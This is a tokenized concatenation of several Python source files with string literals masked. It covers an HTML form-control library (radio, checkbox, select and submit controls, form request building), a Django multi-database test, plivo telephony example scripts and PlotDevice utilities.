. append ( None ) <EOL> return res <EOL> return [ o . name for o in self . items ] <EOL> def _totally_ordered_pairs ( self ) : <EOL> if self . disabled or self . name is None : <EOL> return [ ] <EOL> else : <EOL> return [ ( o . _index , self . name , o . name ) for o in self . items <EOL> if o . selected and not o . disabled ] <EOL> def __str__ ( self ) : <EOL> name = self . name <EOL> if name is None : name = "<STR_LIT>" <EOL> display = [ str ( o ) for o in self . items ] <EOL> infos = [ ] <EOL> if self . disabled : infos . append ( "<STR_LIT>" ) <EOL> if self . readonly : infos . append ( "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( infos ) <EOL> if info : info = "<STR_LIT>" % info <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , <EOL> name , "<STR_LIT:U+002CU+0020>" . join ( display ) , info ) <EOL> class RadioControl ( ListControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , select_default = False , index = None ) : <EOL> attrs . setdefault ( "<STR_LIT:value>" , "<STR_LIT>" ) <EOL> ListControl . __init__ ( self , type , name , attrs , select_default , <EOL> called_as_base_class = True , index = index ) <EOL> self . __dict__ [ "<STR_LIT>" ] = False <EOL> o = Item ( self , attrs , index ) <EOL> o . __dict__ [ "<STR_LIT>" ] = attrs . has_key ( "<STR_LIT>" ) <EOL> def fixup ( self ) : <EOL> ListControl . fixup ( self ) <EOL> found = [ o for o in self . items if o . selected and not o . disabled ] <EOL> if not found : <EOL> if self . _select_default : <EOL> for o in self . items : <EOL> if not o . disabled : <EOL> o . selected = True <EOL> break <EOL> else : <EOL> for o in found [ : - <NUM_LIT:1> ] : <EOL> o . selected = False <EOL> def get_labels ( self ) : <EOL> return [ ] <EOL> class CheckboxControl ( ListControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , select_default = False , index = None ) : <EOL> attrs . setdefault ( "<STR_LIT:value>" , "<STR_LIT>" ) <EOL> ListControl . __init__ ( self , type , name , attrs , select_default , <EOL> called_as_base_class = True , index = index ) <EOL> self . __dict__ [ "<STR_LIT>" ] = True <EOL> o = Item ( self , attrs , index ) <EOL> o . __dict__ [ "<STR_LIT>" ] = attrs . has_key ( "<STR_LIT>" ) <EOL> def get_labels ( self ) : <EOL> return [ ] <EOL> class SelectControl ( ListControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , select_default = False , index = None ) : <EOL> self . attrs = attrs [ "<STR_LIT>" ] . copy ( ) <EOL> self . __dict__ [ "<STR_LIT>" ] = _get_label ( self . attrs ) <EOL> self . __dict__ [ "<STR_LIT:id>" ] = self . attrs . get ( "<STR_LIT:id>" ) <EOL> self . __dict__ [ "<STR_LIT>" ] = self . attrs . has_key ( "<STR_LIT>" ) <EOL> contents = attrs . get ( "<STR_LIT>" ) <EOL> attrs = attrs . copy ( ) <EOL> del attrs [ "<STR_LIT>" ] <EOL> ListControl . __init__ ( self , type , name , self . attrs , select_default , <EOL> called_as_base_class = True , index = index ) <EOL> self . disabled = self . attrs . has_key ( "<STR_LIT>" ) <EOL> self . readonly = self . attrs . has_key ( "<STR_LIT>" ) <EOL> if attrs . has_key ( "<STR_LIT:value>" ) : <EOL> o = Item ( self , attrs , index ) <EOL> o . __dict__ [ "<STR_LIT>" ] = attrs . has_key ( "<STR_LIT>" ) <EOL> label = attrs . get ( "<STR_LIT:label>" ) <EOL> if label : <EOL> o . _labels . append ( Label ( { "<STR_LIT>" : label } ) ) <EOL> if contents and contents != label : <EOL> o . _labels . append ( Label ( { "<STR_LIT>" : contents } ) ) <EOL> elif contents : <EOL> o . _labels . append ( Label ( { "<STR_LIT>" : contents } ) ) <EOL> def fixup ( self ) : <EOL> ListControl . fixup ( self ) <EOL> found = [ o for o in self . items if o . selected ] <EOL> if not found : <EOL> if not self . multiple or self . _select_default : <EOL> for o in self . items : <EOL> if not o . disabled : <EOL> was_disabled = self . disabled <EOL> self . disabled = False <EOL> try : <EOL> o . selected = True <EOL> finally : <EOL> o . disabled = was_disabled <EOL> break <EOL> elif not self . multiple : <EOL> for o in found [ : - <NUM_LIT:1> ] : <EOL> o . selected = False <EOL> class SubmitControl ( ScalarControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> ScalarControl . __init__ ( self , type , name , attrs , index ) <EOL> if self . value is None : self . value = "<STR_LIT>" <EOL> self . readonly = True <EOL> def get_labels ( self ) : <EOL> res = [ ] <EOL> if self . value : <EOL> res . append ( Label ( { "<STR_LIT>" : self . value } ) ) <EOL> res . extend ( ScalarControl . get_labels ( self ) ) <EOL> return res <EOL> def is_of_kind ( self , kind ) : return kind == "<STR_LIT>" <EOL> def _click ( self , form , coord , return_type , request_class = urllib2 . Request ) : <EOL> self . _clicked = coord <EOL> r = form . _switch_click ( return_type , request_class ) <EOL> self . _clicked = False <EOL> return r <EOL> def _totally_ordered_pairs ( self ) : <EOL> if not self . _clicked : <EOL> return [ ] <EOL> return ScalarControl . _totally_ordered_pairs ( self ) <EOL> class ImageControl ( SubmitControl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type , name , attrs , index = None ) : <EOL> SubmitControl . __init__ ( self , type , name , attrs , index ) <EOL> self . readonly = False <EOL> def _totally_ordered_pairs ( self ) : <EOL> clicked = self . _clicked <EOL> if self . disabled or not clicked : <EOL> return [ ] <EOL> name = self . name <EOL> if name is None : return [ ] <EOL> pairs = [ <EOL> ( self . _index , "<STR_LIT>" % name , str ( clicked [ <NUM_LIT:0> ] ) ) , <EOL> ( self . _index + <NUM_LIT:1> , "<STR_LIT>" % name , str ( clicked [ <NUM_LIT:1> ] ) ) , <EOL> ] <EOL> value = self . _value <EOL> if value : <EOL> pairs . append ( ( self . _index + <NUM_LIT:2> , name , value ) ) <EOL> return pairs <EOL> get_labels = ScalarControl . get_labels <EOL> class PasswordControl ( TextControl ) : pass <EOL> class HiddenControl ( TextControl ) : pass <EOL> class TextareaControl ( TextControl ) : pass <EOL> class SubmitButtonControl ( SubmitControl ) : pass <EOL> def is_listcontrol ( control ) : return control . is_of_kind ( "<STR_LIT:list>" ) <EOL> class HTMLForm : <EOL> """<STR_LIT>""" <EOL> type2class = { <EOL> "<STR_LIT:text>" : TextControl , <EOL> "<STR_LIT:password>" : PasswordControl , <EOL> "<STR_LIT>" : HiddenControl , <EOL> "<STR_LIT>" : TextareaControl , <EOL> "<STR_LIT>" : IsindexControl , <EOL> "<STR_LIT:file>" : FileControl , <EOL> "<STR_LIT>" : IgnoreControl , <EOL> "<STR_LIT>" : IgnoreControl , <EOL> "<STR_LIT>" : IgnoreControl , <EOL> "<STR_LIT>" : IgnoreControl , <EOL> "<STR_LIT>" : SubmitControl , <EOL> "<STR_LIT>" : SubmitButtonControl , <EOL> "<STR_LIT:image>" : ImageControl , <EOL> "<STR_LIT>" : RadioControl , <EOL> "<STR_LIT>" : CheckboxControl , <EOL> "<STR_LIT>" : SelectControl , <EOL> } <EOL> def __init__ ( self , action , method = "<STR_LIT:GET>" , <EOL> enctype = "<STR_LIT>" , <EOL> name = None , attrs = None , <EOL> request_class = urllib2 . Request , <EOL> forms = None , labels = None , id_to_labels = None , <EOL> backwards_compat = True ) : <EOL> """<STR_LIT>""" <EOL> self . action = action <EOL> self . method = method <EOL> self . enctype = enctype <EOL> self . name = name <EOL> if attrs is not None : <EOL> self . attrs = attrs . copy ( ) <EOL> else : <EOL> self . attrs = { } <EOL> self . controls = [ ] <EOL> self . _request_class = request_class <EOL> self . _forms = forms <EOL> self . _labels = labels <EOL> self . _id_to_labels = id_to_labels <EOL> self . backwards_compat = backwards_compat <EOL> self . _urlunparse = urlparse . urlunparse <EOL> self . _urlparse = urlparse . urlparse <EOL> def __getattr__ ( self , name ) : <EOL> if name == "<STR_LIT>" : <EOL> return self . _backwards_compat <EOL> return getattr ( HTMLForm , name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT>" : <EOL> name = "<STR_LIT>" <EOL> value = bool ( value ) <EOL> for cc in self . controls : <EOL> try : <EOL> items = cc . items <EOL> except AttributeError : <EOL> continue <EOL> else : <EOL> for ii in items : <EOL> for ll in ii . get_labels ( ) : <EOL> ll . _backwards_compat = value <EOL> self . __dict__ [ name ] = value <EOL> def new_control ( self , type , name , attrs , <EOL> ignore_unknown = False , select_default = False , index = None ) : <EOL> """<STR_LIT>""" <EOL> type = type . lower ( ) <EOL> klass = self . type2class . get ( type ) <EOL> if klass is None : <EOL> if ignore_unknown : <EOL> klass = IgnoreControl <EOL> else : <EOL> klass = TextControl <EOL> a = attrs . copy ( ) <EOL> if issubclass ( klass , ListControl ) : <EOL> control = klass ( type , name , a , select_default , index ) <EOL> else : <EOL> control = klass ( type , name , a , index ) <EOL> if type == "<STR_LIT>" and len ( attrs ) == <NUM_LIT:1> : <EOL> for ii in range ( len ( self . controls ) - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> ctl = self . controls [ ii ] <EOL> if ctl . type == "<STR_LIT>" : <EOL> ctl . close_control ( ) <EOL> break <EOL> control . add_to_form ( self ) <EOL> control . _urlparse = self . _urlparse <EOL> control . _urlunparse = self . _urlunparse <EOL> def fixup ( self ) : <EOL> """<STR_LIT>""" <EOL> for control in self . controls : <EOL> control . fixup ( ) <EOL> self . backwards_compat = self . _backwards_compat <EOL> def __str__ ( self ) : <EOL> header = "<STR_LIT>" % ( <EOL> ( self . name and self . name + "<STR_LIT:U+0020>" or "<STR_LIT>" ) , <EOL> self . method , self . action , self . enctype ) <EOL> rep = [ header ] <EOL> for control in self . controls : <EOL> rep . append ( "<STR_LIT>" % str ( control ) ) <EOL> return "<STR_LIT>" % "<STR_LIT:\n>" . join ( rep ) <EOL> def __getitem__ ( self , name ) : <EOL> return self . find_control ( name ) . value <EOL> def __contains__ ( self , name ) : <EOL> return bool ( self . find_control ( name ) ) <EOL> def __setitem__ ( self , name , value ) : <EOL> control = self . find_control ( name ) <EOL> try : <EOL> control . value = value <EOL> except AttributeError , e : <EOL> raise ValueError ( str ( e ) ) <EOL> def get_value ( self , <EOL> name = None , type = None , kind = None , id = None , nr = None , <EOL> by_label = False , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> if by_label : <EOL> deprecation ( "<STR_LIT>" ) <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> if by_label : <EOL> try : <EOL> meth = c . get_value_by_label <EOL> except AttributeError : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" % c . name ) <EOL> else : <EOL> return meth ( ) <EOL> else : <EOL> return c . value <EOL> def set_value ( self , value , <EOL> name = None , type = None , kind = None , id = None , nr = None , <EOL> by_label = False , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> if by_label : <EOL> deprecation ( "<STR_LIT>" ) <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> if by_label : <EOL> try : <EOL> meth = c . set_value_by_label <EOL> except AttributeError : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" % c . name ) <EOL> else : <EOL> meth ( value ) <EOL> else : <EOL> c . value = value <EOL> def get_value_by_label ( <EOL> self , name = None , type = None , kind = None , id = None , label = None , nr = None ) : <EOL> """<STR_LIT>""" <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> return c . get_value_by_label ( ) <EOL> def set_value_by_label ( <EOL> self , value , <EOL> name = None , type = None , kind = None , id = None , label = None , nr = None ) : <EOL> """<STR_LIT>""" <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> c . set_value_by_label ( value ) <EOL> def set_all_readonly ( self , readonly ) : <EOL> for control in self . controls : <EOL> control . readonly = bool ( readonly ) <EOL> def clear_all ( self ) : <EOL> """<STR_LIT>""" <EOL> for control in self . controls : <EOL> control . clear ( ) <EOL> def clear ( self , <EOL> name = None , type = None , kind = None , id = None , nr = None , label = None ) : <EOL> """<STR_LIT>""" <EOL> c = self . find_control ( name , type , kind , id , label = label , nr = nr ) <EOL> c . clear ( ) <EOL> def possible_items ( self , <EOL> name = None , type = None , kind = None , id = None , <EOL> nr = None , by_label = False , label = None ) : <EOL> """<STR_LIT>""" <EOL> c = self . _find_list_control ( name , type , kind , id , label , nr ) <EOL> return c . possible_items ( by_label ) <EOL> def set ( self , selected , item_name , <EOL> name = None , type = None , kind = None , id = None , nr = None , <EOL> by_label = False , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . _find_list_control ( name , type , kind , id , label , nr ) . set ( <EOL> selected , item_name , by_label ) <EOL> def toggle ( self , item_name , <EOL> name = None , type = None , kind = None , id = None , nr = None , <EOL> by_label = False , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . _find_list_control ( name , type , kind , id , label , nr ) . toggle ( <EOL> item_name , by_label ) <EOL> def set_single ( self , selected , <EOL> name = None , type = None , kind = None , id = None , <EOL> nr = None , by_label = None , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . _find_list_control ( <EOL> name , type , kind , id , label , nr ) . set_single ( selected ) <EOL> def toggle_single ( self , name = None , type = None , kind = None , id = None , <EOL> nr = None , by_label = None , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . _find_list_control ( name , type , kind , id , label , nr ) . toggle_single ( ) <EOL> def add_file ( self , file_object , content_type = None , filename = None , <EOL> name = None , id = None , nr = None , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . find_control ( name , "<STR_LIT:file>" , id = id , label = label , nr = nr ) . add_file ( <EOL> file_object , content_type , filename ) <EOL> def click ( self , name = None , type = None , id = None , nr = <NUM_LIT:0> , coord = ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> request_class = urllib2 . Request , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _click ( name , type , id , label , nr , coord , "<STR_LIT>" , <EOL> self . _request_class ) <EOL> def click_request_data ( self , <EOL> name = None , type = None , id = None , <EOL> nr = <NUM_LIT:0> , coord = ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> request_class = urllib2 . Request , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _click ( name , type , id , label , nr , coord , "<STR_LIT>" , <EOL> self . _request_class ) <EOL> def click_pairs ( self , name = None , type = None , id = None , <EOL> nr = <NUM_LIT:0> , coord = ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _click ( name , type , id , label , nr , coord , "<STR_LIT>" , <EOL> self . _request_class ) <EOL> def find_control ( self , <EOL> name = None , type = None , kind = None , id = None , <EOL> predicate = None , nr = None , <EOL> label = None ) : <EOL> """<STR_LIT>""" <EOL> if ( ( name is None ) and ( type is None ) and ( kind is None ) and <EOL> ( id is None ) and ( label is None ) and ( predicate is None ) and <EOL> ( nr is None ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> return self . _find_control ( name , type , kind , id , label , predicate , nr ) <EOL> def _find_list_control ( self , <EOL> name = None , type = None , kind = None , id = None , <EOL> label = None , nr = None ) : <EOL> if ( ( name is None ) and ( type is None ) and ( kind is None ) and <EOL> ( id is None ) and ( label is None ) and ( nr is None ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> return self . _find_control ( name , type , kind , id , label , <EOL> is_listcontrol , nr ) <EOL> def _find_control ( self , name , type , kind , id , label , predicate , nr ) : <EOL> if ( ( name is not None ) and ( name is not Missing ) and <EOL> not isstringlike ( name ) ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( type is not None ) and not isstringlike ( type ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( kind is not None ) and not isstringlike ( kind ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( id is not None ) and not isstringlike ( id ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( label is not None ) and not isstringlike ( label ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( predicate is not None ) and not callable ( predicate ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( nr is not None ) and nr < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> orig_nr = nr <EOL> found = None <EOL> ambiguous = False <EOL> if nr is None and self . backwards_compat : <EOL> nr = <NUM_LIT:0> <EOL> for control in self . controls : <EOL> if ( ( name is not None and name != control . name ) and <EOL> ( name is not Missing or control . name is not None ) ) : <EOL> continue <EOL> if type is not None and type != control . type : <EOL> continue <EOL> if kind is not None and not control . is_of_kind ( kind ) : <EOL> continue <EOL> if id is not None and id != control . id : <EOL> continue <EOL> if predicate and not predicate ( control ) : <EOL> continue <EOL> if label : <EOL> for l in control . get_labels ( ) : <EOL> if l . text . find ( label ) > - <NUM_LIT:1> : <EOL> break <EOL> else : <EOL> continue <EOL> if nr is not None : <EOL> if nr == <NUM_LIT:0> : <EOL> return control <EOL> nr -= <NUM_LIT:1> <EOL> continue <EOL> if found : <EOL> ambiguous = True <EOL> break <EOL> found = control <EOL> if found and not ambiguous : <EOL> return found <EOL> description = [ ] <EOL> if name is not None : description . append ( "<STR_LIT>" % repr ( name ) ) <EOL> if type is not None : description . append ( "<STR_LIT>" % type ) <EOL> if kind is not None : description . append ( "<STR_LIT>" % kind ) <EOL> if id is not None : description . append ( "<STR_LIT>" % id ) <EOL> if label is not None : description . append ( "<STR_LIT>" % label ) <EOL> if predicate is not None : <EOL> description . append ( "<STR_LIT>" % predicate ) <EOL> if orig_nr : description . append ( "<STR_LIT>" % orig_nr ) <EOL> description = "<STR_LIT:U+002CU+0020>" . join ( description ) <EOL> if ambiguous : <EOL> raise AmbiguityError ( "<STR_LIT>" + description ) <EOL> elif not found : <EOL> raise ControlNotFoundError ( "<STR_LIT>" + description ) <EOL> assert False <EOL> def _click ( self , name , type , id , label , nr , coord , return_type , <EOL> request_class = urllib2 . Request ) : <EOL> try : <EOL> control = self . _find_control ( <EOL> name , type , "<STR_LIT>" , id , label , None , nr ) <EOL> except ControlNotFoundError : <EOL> if ( ( name is not None ) or ( type is not None ) or ( id is not None ) or <EOL> ( nr != <NUM_LIT:0> ) ) : <EOL> raise <EOL> return self . _switch_click ( return_type , request_class ) <EOL> else : <EOL> return control . _click ( self , coord , return_type , request_class ) <EOL> def _pairs ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ( k , v ) for ( i , k , v , c_i ) in self . _pairs_and_controls ( ) ] <EOL> def _pairs_and_controls ( self ) : <EOL> """<STR_LIT>""" <EOL> pairs = [ ] <EOL> for control_index in range ( len ( self . controls ) ) : <EOL> control = self . controls [ control_index ] <EOL> for ii , key , val in control . _totally_ordered_pairs ( ) : <EOL> pairs . append ( ( ii , key , val , control_index ) ) <EOL> pairs . sort ( ) <EOL> return pairs <EOL> def _request_data ( self ) : <EOL> """<STR_LIT>""" <EOL> method = self . method . upper ( ) <EOL> parts = self . _urlparse ( self . action ) <EOL> rest , ( query , frag ) = parts [ : - <NUM_LIT:2> ] , parts [ - <NUM_LIT:2> : ] <EOL> if method == "<STR_LIT:GET>" : <EOL> if self . enctype != "<STR_LIT>" : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % self . enctype ) <EOL> parts = rest + ( urlencode ( self . _pairs ( ) ) , None ) <EOL> uri = self . _urlunparse ( parts ) <EOL> return uri , None , [ ] <EOL> elif method == "<STR_LIT:POST>" : <EOL> parts = rest + ( query , None ) <EOL> uri = self . _urlunparse ( parts ) <EOL> if self . enctype == "<STR_LIT>" : <EOL> return ( uri , urlencode ( self . _pairs ( ) ) , <EOL> [ ( "<STR_LIT:Content-Type>" , self . enctype ) ] ) <EOL> elif self . enctype == "<STR_LIT>" : <EOL> data = StringIO ( ) <EOL> http_hdrs = [ ] <EOL> mw = MimeWriter ( data , http_hdrs ) <EOL> f = mw . startmultipartbody ( "<STR_LIT>" , add_to_http_hdrs = True , <EOL> prefix = <NUM_LIT:0> ) <EOL> for ii , k , v , control_index in self . _pairs_and_controls ( ) : <EOL> self . controls [ control_index ] . _write_mime_data ( mw , k , v ) <EOL> mw . lastpart ( ) <EOL> return uri , data . getvalue ( ) , http_hdrs <EOL> else : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % self . enctype ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % method ) <EOL> def _switch_click ( self , return_type , request_class = urllib2 . Request ) : <EOL> if return_type == "<STR_LIT>" : <EOL> return self . _pairs ( ) <EOL> elif return_type == "<STR_LIT>" : <EOL> return self . _request_data ( ) <EOL> else : <EOL> req_data = self . _request_data ( ) <EOL> req = request_class ( req_data [ <NUM_LIT:0> ] , req_data [ <NUM_LIT:1> ] ) <EOL> for key , val in req_data [ <NUM_LIT:2> ] : <EOL> add_hdr = req . add_header <EOL> if key . lower ( ) == "<STR_LIT>" : <EOL> try : <EOL> add_hdr = req . add_unredirected_header <EOL> except AttributeError : <EOL> pass <EOL> add_hdr ( key , val ) <EOL> return req </s>
<s> """<STR_LIT>""" <EOL> from . lazyviews import LazyViews <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' </s>
<s> from rororo . schemas . empty import EMPTY_OBJECT <EOL> request = None <EOL> response = EMPTY_OBJECT </s>
<s> from tddspry . django import TestCase <EOL> from tddspry . django . helpers import EMAIL , PASSWORD , USERNAME <EOL> from django . contrib . auth . models import User <EOL> class TestModels ( TestCase ) : <EOL> multidb = True <EOL> def setup ( self ) : <EOL> self . model = User <EOL> self . manager = self . model . objects . using ( '<STR_LIT>' ) <EOL> self . kwargs = { '<STR_LIT:username>' : USERNAME , <EOL> '<STR_LIT:password>' : PASSWORD , <EOL> '<STR_LIT:email>' : EMAIL } <EOL> self . sgrawk = { '<STR_LIT:username>' : USERNAME [ : : - <NUM_LIT:1> ] , <EOL> '<STR_LIT:password>' : PASSWORD [ : : - <NUM_LIT:1> ] , <EOL> '<STR_LIT:email>' : EMAIL [ : : - <NUM_LIT:1> ] } <EOL> def test_using_keyword ( self ) : <EOL> self . assert_count ( self . model , <NUM_LIT:0> ) <EOL> self . assert_count ( self . model , <NUM_LIT:0> , using = '<STR_LIT>' ) <EOL> self . assert_create ( self . model , using = '<STR_LIT>' , ** self . kwargs ) <EOL> self . assert_count ( self . model , <NUM_LIT:0> ) <EOL> self . assert_not_count ( self . model , <NUM_LIT:0> , using = '<STR_LIT>' ) <EOL> self . assert_count ( self . model , <NUM_LIT:1> , using = '<STR_LIT>' ) <EOL> for key , value in self . kwargs . items ( ) : <EOL> self . assert_not_read ( self . model , ** { key : value } ) <EOL> for key , value in self . kwargs . items ( ) : <EOL> self . assert_read ( self . model , using = '<STR_LIT>' , ** { key : value } ) <EOL> try : <EOL> self . assert_update ( self . model , ** self . sgrawk ) <EOL> except AssertionError : <EOL> pass <EOL> else : <EOL> assert False , '<STR_LIT>' '<STR_LIT>' % self . model <EOL> self . assert_update ( self . model , using = '<STR_LIT>' , ** self . sgrawk ) <EOL> self . assert_not_read ( self . model , ** self . kwargs ) <EOL> self . assert_not_read ( self . model , using = '<STR_LIT>' , ** self . kwargs ) <EOL> self . assert_delete ( self . model ) <EOL> self . assert_delete ( self . model , using = '<STR_LIT>' ) <EOL> self . assert_count ( self . model , <NUM_LIT:0> ) <EOL> self . assert_count ( self . model , <NUM_LIT:0> , using = '<STR_LIT>' ) <EOL> def test_using_manager ( self ) : <EOL> self . assert_count ( self . manager , <NUM_LIT:0> ) <EOL> self . assert_create ( self . manager , ** self . kwargs ) <EOL> self . assert_not_count ( self . manager , <NUM_LIT:0> ) <EOL> self . assert_count ( self . manager , <NUM_LIT:1> ) <EOL> for key , value in self . kwargs . items ( ) : <EOL> self . assert_read ( self . manager , ** { key : value } ) <EOL> self . assert_update ( self . manager , ** self . sgrawk ) <EOL> self . assert_not_read ( self . manager , ** self . kwargs ) <EOL> self . assert_delete ( self . manager ) <EOL> self . assert_count ( self . manager , <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' </s>
<s> import plivohelper <EOL> import sys <EOL> try : <EOL> room = sys . argv [ <NUM_LIT:1> ] <EOL> fileformat = sys . argv [ <NUM_LIT:2> ] <EOL> filepath = sys . argv [ <NUM_LIT:3> ] <EOL> except IndexError : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> filename = sys . argv [ <NUM_LIT:4> ] <EOL> except IndexError : <EOL> filename = '<STR_LIT>' <EOL> REST_API_URL = '<STR_LIT>' <EOL> API_VERSION = '<STR_LIT>' <EOL> SID = '<STR_LIT>' <EOL> AUTH_TOKEN = '<STR_LIT>' <EOL> plivo = plivohelper . REST ( REST_API_URL , SID , AUTH_TOKEN , API_VERSION ) <EOL> call_params = { '<STR_LIT>' : room , '<STR_LIT>' : fileformat , '<STR_LIT>' : filepath , '<STR_LIT>' : filename } <EOL> try : <EOL> print plivo . conference_record_start ( call_params ) <EOL> except Exception , e : <EOL> print e </s>
<s> from flask import Flask , request , render_template <EOL> import plivohelper <EOL> import os <EOL> response_server = Flask ( "<STR_LIT>" ) <EOL> response_server . debug = True <EOL> @ response_server . errorhandler ( <NUM_LIT> ) <EOL> def page_not_found ( error ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> return '<STR_LIT>' , <NUM_LIT> <EOL> @ response_server . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def ringing ( ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> return "<STR_LIT:OK>" <EOL> @ response_server . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def hangup ( ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> return "<STR_LIT:OK>" <EOL> @ response_server . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def answered ( ) : <EOL> if request . method == '<STR_LIT:POST>' : <EOL> try : <EOL> print "<STR_LIT>" % request . form [ '<STR_LIT>' ] <EOL> except : <EOL> pass <EOL> else : <EOL> try : <EOL> print "<STR_LIT>" % request . args [ '<STR_LIT>' ] <EOL> except : <EOL> pass <EOL> r = plivohelper . Response ( ) <EOL> r . addHangup ( reason = "<STR_LIT>" ) <EOL> print "<STR_LIT>" % r <EOL> return render_template ( '<STR_LIT>' , response = r ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if not os . path . isfile ( "<STR_LIT>" ) : <EOL> print "<STR_LIT>" <EOL> else : <EOL> response_server . run ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) </s>
<s> import sys <EOL> from os . path import dirname , abspath , join <EOL> sys . path . append ( join ( dirname ( abspath ( __file__ ) ) , '<STR_LIT>' ) ) <EOL> import plotdevice . gui <EOL> import AppKit <EOL> from signal import signal , SIGINT <EOL> signal ( SIGINT , lambda m , n : AppKit . NSApplication . sharedApplication ( ) . terminate_ ( True ) ) <EOL> from PyObjCTools import AppHelper <EOL> AppHelper . runEventLoop ( ) </s>
<s> import os <EOL> import sys <EOL> import re <EOL> import json <EOL> import csv <EOL> from contextlib import contextmanager <EOL> from collections import OrderedDict , defaultdict <EOL> from os . path import abspath , dirname , exists , join , splitext <EOL> from random import choice , shuffle <EOL> from Foundation import NSAutoreleasePool <EOL> from plotdevice import DeviceError <EOL> from . readers import read , XMLParser <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def grid ( cols , rows , colSize = <NUM_LIT:1> , rowSize = <NUM_LIT:1> , shuffled = False ) : <EOL> """<STR_LIT>""" <EOL> rowRange = xrange ( int ( rows ) ) <EOL> colRange = xrange ( int ( cols ) ) <EOL> if ( shuffled ) : <EOL> rowRange = list ( rowRange ) <EOL> colRange = list ( colRange ) <EOL> shuffle ( rowRange ) <EOL> shuffle ( colRange ) <EOL> for y in rowRange : <EOL> for x in colRange : <EOL> yield ( x * colSize , y * rowSize ) <EOL> def random ( v1 = None , v2 = None , mean = None , sd = None ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> if v1 != None and v2 == None : <EOL> if isinstance ( v1 , float ) : <EOL> return random . random ( ) * v1 <EOL> else : <EOL> return int ( random . random ( ) * v1 ) <EOL> elif v1 != None and v2 != None : <EOL> if isinstance ( v1 , float ) or isinstance ( v2 , float ) : <EOL> start = min ( v1 , v2 ) <EOL> end = max ( v1 , v2 ) <EOL> return start + random . random ( ) * ( end - start ) <EOL> else : <EOL> start = min ( v1 , v2 ) <EOL> end = max ( v1 , v2 ) + <NUM_LIT:1> <EOL> return int ( start + random . random ( ) * ( end - start ) ) <EOL> elif mean != None and sd != None : <EOL> return random . normalvariate ( mean , sd ) <EOL> else : <EOL> return random . random ( ) <EOL> def files ( path = "<STR_LIT:*>" , case = True ) : <EOL> """<STR_LIT>""" <EOL> from iglob import iglob <EOL> if type ( path ) == unicode : <EOL> path . encode ( '<STR_LIT:utf-8>' ) <EOL> path = os . path . expanduser ( path ) <EOL> return list ( iglob ( path . decode ( '<STR_LIT:utf-8>' ) , case = case ) ) <EOL> def autotext ( sourceFile ) : <EOL> from plotdevice . util . kgp import KantGenerator <EOL> k = KantGenerator ( sourceFile ) <EOL> return k . output ( ) <EOL> def _as_sequence ( seq ) : <EOL> if not hasattr ( seq , '<STR_LIT>' ) : <EOL> badtype = '<STR_LIT>' 